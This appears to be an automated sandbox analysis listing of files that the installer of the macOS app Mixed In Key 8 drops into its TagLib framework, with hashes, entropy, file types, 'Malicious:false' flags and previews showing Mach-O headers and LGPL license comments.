                                                                                                    SHA-512:5CD576A6532C2CCC9C4B0E4796480CC0D6E3956A4C9CD4297C08B3E0102579869348384E223DB190AEDB59F5B4D53B284191B2DE810DE45E54D50ED2F5DD3126
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT..........................................................__text..........__TEXT..................;.......................................__stubs.........__TEXT...........5......l........5..............................__stub_helper...__TEXT..........X<..............X<..............................__objc_methname.__TEXT...........G...............G..............................__cstring.......__TEXT...........u.......6.......u..............................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..........................................................__ustring.......__TEXT..........................................................__const.........__TEXT..........................................................__gcc_except_tab__TEXT..........p.......T/......p...............................__unwind_info...__TEXT..........................................................__eh_frame......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/.BC.T_R27kFH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):934272
                                                                                                    Entropy (8bit):6.1538518216777645
                                                                                                    Encrypted:false
                                                                                                    MD5:A74579D680F6BBD3B416DC3964F6FB1D
                                                                                                    SHA1:C3CD4330D9378D66D8E7958D3539266BDE440C91
                                                                                                    SHA-256:89A6CF6CBA3D366EC096A392B53031BC4DABFABF141221257250F47607672AA4
                                                                                                    SHA-512:CFB538F8C9EED8DEFA8CF8B705145D8C4B25B13605C9CC0E2C6661F737E3220FA0279249F6A5D6D5F93BE6A764450B592740BE92B4B616CDC64648E781CB25E2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT...................@...............@......................__text..........__TEXT..................X;......................................__stubs.........__TEXT...........O...............O..............................__stub_helper...__TEXT..........`Q..............`Q..............................__gcc_except_tab__TEXT...........S...............S..............................__const.........__TEXT...........f......3=.......f..............................__cstring.......__TEXT..................Q?......................................__unwind_info...__TEXT..........$........G......$...............................__eh_frame......__TEXT..........0*..............0*......................................__DATA...........@.......P.......@.......P......................__got...........__DATA...........@...............@..................A...........__nl_symbol_ptr.__DATA...........A...............A..................r...........__la_symbol_ptr.__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_0p2dhG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3599
                                                                                                    Entropy (8bit):4.335073814210081
                                                                                                    Encrypted:false
                                                                                                    MD5:FC3B069583610C00A2DCD395A2986CC1
                                                                                                    SHA1:A144D4656A2C0AFBFDD8F410191443BFABD62FF2
                                                                                                    SHA-256:6355A3672309B75D8096A0334071E780EFF80F5483E918AD9B7A6DC16126D7DC
                                                                                                    SHA-512:DCCAFAF043A39125B41C61FD08D204E0FDCE9B28199F3CF479C274E718C691D971098C226EFE8D08ACC33AB06D61D8A8858F847014DEA181B264322F76B9A179
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_17UNZf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):6783
                                                                                                    Entropy (8bit):4.323733700297132
                                                                                                    Encrypted:false
                                                                                                    MD5:5688F0F231B661D9F1E8FE8F0FBBD915
                                                                                                    SHA1:4CA4E58D3EFC9BE7BEC255E995178394D231E6D7
                                                                                                    SHA-256:3C980E66D6E3BEFBD3E962D738BEDAB6916E2B46804EE931A54306AEF84164D0
                                                                                                    SHA-512:8E7BB8FF49D81B412E5C79B7277C2433858A89BEEEAA8878C1849BC6E4E6EC1A5FAD9DD3859CB1594A9B6ABC8DBD04FA989D2B193A671A8E4FDF1664A58646F9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1Iwpux
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5142
                                                                                                    Entropy (8bit):4.386713157750963
                                                                                                    Encrypted:false
                                                                                                    MD5:CB74E43BF94968946BB996DB512561E1
                                                                                                    SHA1:37BB5BB688D46B1741D48213E233B9CCDD258257
                                                                                                    SHA-256:0681E752E19D220B3CE0B6F0D5D6AC432976176EAC77ED83D55459C30F22786E
                                                                                                    SHA-512:23BB23FA2982F3440717D7DCE558DE0E4062D1C2B598BEFAE726F8E6EDE975DCF5220559E434702BF2F3882D3F8E69630651BC43573BE7985942EE2EE338CB5A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1jdcKQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):6288
                                                                                                    Entropy (8bit):4.454831999769721
                                                                                                    Encrypted:false
                                                                                                    MD5:E3604E9DA33E3E88BE9EC7C0447F2A92
                                                                                                    SHA1:667067EBE1F19628A0B94E23B23183F8E010772B
                                                                                                    SHA-256:3A7F2179133CBAC189CFF1F91BEC375B2D4AAA62CEAA7C54C4550F13F63F0A78
                                                                                                    SHA-512:8E5D6EE7D4A7227A74100BAF6694FDE0C32A82B194E58F17725FAF420376006EB96D347EF4D064E41702BB63CDF13E7EA1595B62818A4B8A320D7AAE00CB315C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. copyright : (C) 2006 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser Gene
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1us86L
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5177
                                                                                                    Entropy (8bit):4.1399983791455
                                                                                                    Encrypted:false
                                                                                                    MD5:59FF34321095A27B24ABF8B96A676585
                                                                                                    SHA1:6B5CE73CA3FDF626783D5B5508676FD21691B492
                                                                                                    SHA-256:917AD62BD80A9311C344DA1F1750101B9CB1331A05B922C96A42BFB3681BCE23
                                                                                                    SHA-512:48F74299809800D05B0DD5F77C8CB95DB16588450E9841276A0C71AAE898C2B2C50487B56D0E5CAB8E5CA8E3D3C011D73122DB6CE30CB063AE2EDEDBF7B442FF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1uuNxo
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7748
                                                                                                    Entropy (8bit):4.377092130127323
                                                                                                    Encrypted:false
                                                                                                    MD5:1974BE473B60FD79D10E7284B9C2BCA3
                                                                                                    SHA1:C5A11CDD5EA5BB91ED91AAFE5402CAAE6EB0F865
                                                                                                    SHA-256:85DF4C564560B5A491FE18B64AD9370EEC49D8FB720B734C9E4FDA31C38E5D68
                                                                                                    SHA-512:7B6B62875B7944C380AE814D6DEE273233DBE7117F2EC8B4B6E781BDF2C1BA626B7B2B5A719788D0146DDB8ED471E340D16AFAD9A1B33929367F5F303B7D1A49
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2Dh8jD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):14815
                                                                                                    Entropy (8bit):4.377395583415838
                                                                                                    Encrypted:false
                                                                                                    MD5:5076DF959415AEF20C1089B571194E01
                                                                                                    SHA1:4DACE95E456A9ECD53E90EC77C2ADBC37DEE2E95
                                                                                                    SHA-256:5F0133BB130C78FF52087F8C1977C2B16DABA18E4B1E5654CBD548C13D0B6E3A
                                                                                                    SHA-512:F922204DAAD64B3B440E675C7E7BE009B449FEEB8AC0D48B417DD5085A1A42EB2479E5A8A2C21C39BD554F029215E316A8D0E1735153726759906B752E58F337
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2d01YM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):16171
                                                                                                    Entropy (8bit):4.475375878007668
                                                                                                    Encrypted:false
                                                                                                    MD5:60C30E9F428EAD6208F60443F13488BF
                                                                                                    SHA1:5CCCE1D4A83BB45365CA1CE6D9CDB02D76DD452D
                                                                                                    SHA-256:B61071AF5A99E54AB5D1E7A3FFB2E78A32B7823E32BF912286723E58F9336FA6
                                                                                                    SHA-512:733100C9FAF4BCE36EDE0F6377B3435D0B7F1A0492FD22ECB8674329052E877D4264FC2A8AAD5D2B348C88C19270356D57A5A9D36A101CDC943D7D7CB9EF2281
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2eWFnH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):8035
                                                                                                    Entropy (8bit):4.3977045475678604
                                                                                                    Encrypted:false
                                                                                                    MD5:618CA3BDBBB7F39259CB0988644210D9
                                                                                                    SHA1:3D0D05DE9D19D32C294198D368F8591F33699DD9
                                                                                                    SHA-256:F65DB1B9330BECBD9A89D36063F18373678D431DEA500A674A72A66CBC78512A
                                                                                                    SHA-512:ADAE306F283728D1044EF044DD65ACF4FBF936FECC1737ABF4CEB0A69851331358F20530C7517D92E474F29DBB250016473F4298800710309B8B44C4634FA2F7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2hSgag
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):12558
                                                                                                    Entropy (8bit):4.623609197432942
                                                                                                    Encrypted:false
                                                                                                    MD5:51484F064A1661B43C6B50047C79E432
                                                                                                    SHA1:32F6F53E2BB2FD1C8991D61792FF2812741C3E52
                                                                                                    SHA-256:8A6674A7DF6D2A3E8D2221B5D5747CBB9FC3C85B37CA3FA78AAE8CEF3B3B4FCF
                                                                                                    SHA-512:57E8A04BFC969D0B65397CCD3DA0DBC5D7DC051632A6CF526A23CF7BB60940556E08988B794940DF7C1DF9A7DD0A76F6FA40FBCC0D458187F953539974DC6968
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_3LizoG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):2759
                                                                                                    Entropy (8bit):4.23311756659942
                                                                                                    Encrypted:false
                                                                                                    MD5:A95BF5B4B235AA95D0C1FBB4738D2DF5
                                                                                                    SHA1:6B478AC0711E7582EEBA5B9C1799253D8B5D9E2D
                                                                                                    SHA-256:877934D36A162E4948C5D82120E8F75F52F26301E060BB3D93E9B37DE6D7A85A
                                                                                                    SHA-512:810DDECD3DB19060363547530DF4C57353AC82E984E1AA2E0E2B7896F834AF94ECFE2535D256AD553D12AD26FD72260526C100715104204690F5327A514891D8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_426dSg
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3031
                                                                                                    Entropy (8bit):4.221743986397928
                                                                                                    Encrypted:false
                                                                                                    MD5:ED0BE593364765AB6C7703E7FD960D26
                                                                                                    SHA1:62ACBB252C253A999A5A78A81849D209DE199969
                                                                                                    SHA-256:4BD358E99E3A181F5889BC3B41D4D67D3CB2DC741F0216C027E2A2BADBDD9273
                                                                                                    SHA-512:3294BAECE0CE391E0B439DED64012D53E0A45855E4AAF0B7DA707752D1CC0FB9211346D8EE1F2C129857D605DE7E9474229B35646C72E9DF75BA469FBF8EFD00
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_46O1k3
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3406
                                                                                                    Entropy (8bit):4.423663971658814
                                                                                                    Encrypted:false
                                                                                                    MD5:B5A4CC258F1C0C847B186CA5DB543A0F
                                                                                                    SHA1:BBF2C76B75D5B02A4A48B1D72EE9914D8464E65C
                                                                                                    SHA-256:3E2ADDA474795CE17A6BB087A48E30D050286D24E327EECA058A25F4E478F50A
                                                                                                    SHA-512:A450B2634D0FA6B439A96FF1EB68FD6F9E38AB262FBC44DC23C340FFE98BC9F3DC16FDB7798A003DD0E77FC76EC22C44845458EE1ADBA4A197AC2F656985F234
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4BlLmV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):6282
                                                                                                    Entropy (8bit):4.449816789506483
                                                                                                    Encrypted:false
                                                                                                    MD5:B0E9BCA6211313E42B32D2E2E1B421AC
                                                                                                    SHA1:307FDCC52F555E2072B31283FCE6D6B8C2C21A83
                                                                                                    SHA-256:47D442813BB351B52DDC6186FAEF3150BF01C1E3C922EA6B6C4C7ADFF2C76229
                                                                                                    SHA-512:725EF5C629AC3E68DE5D465CCFEF56F0AA65212C4D8460245F86C836C269BE184BDF25C4C062741CF4E3B6548F41C4C66A4AF3A83F0CD34D35DD00490D766B32
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2007,2011 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4hwYcs
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3849
                                                                                                    Entropy (8bit):4.382512488472104
                                                                                                    Encrypted:false
                                                                                                    MD5:6C190AB2DB365D1D347ABF3DF8BD7DB7
                                                                                                    SHA1:4489D88570E7B54DBF230F88732F02639E556321
                                                                                                    SHA-256:42773EEDDFB23A34D888EEE47698838733F933E248768B05EE197D547362DF9C
                                                                                                    SHA-512:F143197C1D5EF9AFF32A6A9AB698F8018DC491E1F1CEA32E6D86DEF21B48E22296D31BDA632744B7B2BF4C099527D0AD85127AF60D5842EAD78CB893450FF1A4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4x6fIv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7084
                                                                                                    Entropy (8bit):4.389516451879127
                                                                                                    Encrypted:false
                                                                                                    MD5:2A2E00B9E15D1A44BE4A8DD6B2217296
                                                                                                    SHA1:59026D09A8A637F190CBE7D6F1648CC20013C46B
                                                                                                    SHA-256:0CE90EB473E6850F93D336D6E9B5F584A0CAAE77DE87EA53D9F3E01632A7FC94
                                                                                                    SHA-512:C3AF03741A035703BEC19097278BDD0B76ABD7848EE6AC8B4FFCCCCCE365B6EAC8BF566E24C7F74927EF06A245B380F1601A771719B03863BEA861ECFB01E1C7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_5BaPmX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):11974
                                                                                                    Entropy (8bit):4.42043505852269
                                                                                                    Encrypted:false
                                                                                                    MD5:513B91267A9CF75E665198281CC077EE
                                                                                                    SHA1:2D63BBF0DD90E8E71B0D54EDA398B92F527D1A09
                                                                                                    SHA-256:AA2B0278DBDF77DBBCA5B65D985D558C7E71C2B7FC7E133ED688F87FFF58EE48
                                                                                                    SHA-512:F84A6EB3A342780FAC5FEFAE51CBB50663BA564A56D90B141FC60D9222A1C3491F5907F1626606EF140C5E12333B78108793369FB5A004A339EC4F65BD6CF300
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2003 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
